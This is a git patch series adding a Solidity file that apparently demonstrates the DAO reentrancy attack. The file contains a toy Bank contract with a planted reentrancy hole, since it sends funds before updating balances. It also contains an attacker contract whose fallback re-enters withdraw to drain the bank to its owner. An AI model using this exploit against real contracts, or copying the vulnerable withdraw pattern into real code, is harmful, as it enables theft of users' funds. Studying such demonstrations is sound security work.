From cea3e45d8621c79e2e63fcbf9c49424078d1dcd2 Mon Sep 17 00:00:00 2001 From: Shubhorup Biswas Date: Mon, 27 Aug 2018 14:46:34 +0530 Subject: [PATCH 1/2] theDAO hack --- DAOhack.sol | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 DAOhack.sol diff --git a/DAOhack.sol b/DAOhack.sol new file mode 100644 index 0000000..4a2b16a --- /dev/null +++ b/DAOhack.sol @@ -0,0 +1,45 @@ +pragma solidity ^0.4.16; + +contract Bank { + mapping(address => uint256) public clients; + uint256 public ethBalance; + + function deposit() public payable { + clients[msg.sender] = msg.value + clients[msg.sender]; + ethBalance = ethBalance + msg.value; + } + + function withdraw(uint256 amount) public { + require(amount <= clients[msg.sender]); + msg.sender.call.value(amount)(); + ethBalance = ethBalance - amount; + clients[msg.sender] = clients[msg.sender] - amount; + } +} + +contract DAOhack { + + address owner; + Bank public bank; + bool public done = false; + + constructor(address _bank) public { + owner = msg.sender; + bank = Bank(_bank); + } + + function() public payable { + if (!done) { + done = true; + bank.withdraw(bank.clients(this)); + bank.ethBalance; + } + } + + function execute() payable { + uint balance = msg.value; + bank.deposit.value(this.balance)(); + bank.withdraw(balance); + owner.transfer(this.balance); + } +} From 9056ef50214973af87a62f5021ea886664d7432d Mon Sep 17 00:00:00 2001 From: Shubhorup Biswas Date: Mon, 27 Aug 2018 14:52:22 +0530 Subject: [PATCH 2/2] code cleanup --- DAOhack.sol | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/DAOhack.sol b/DAOhack.sol index 4a2b16a..1ae85b7 100644 --- a/DAOhack.sol +++ b/DAOhack.sol @@ -32,14 +32,12 @@ contract DAOhack { if (!done) { done = true; bank.withdraw(bank.clients(this)); - bank.ethBalance; } } function execute() payable { - uint balance = msg.value; bank.deposit.value(this.balance)(); - bank.withdraw(balance); + bank.withdraw(msg.value); owner.transfer(this.balance); } }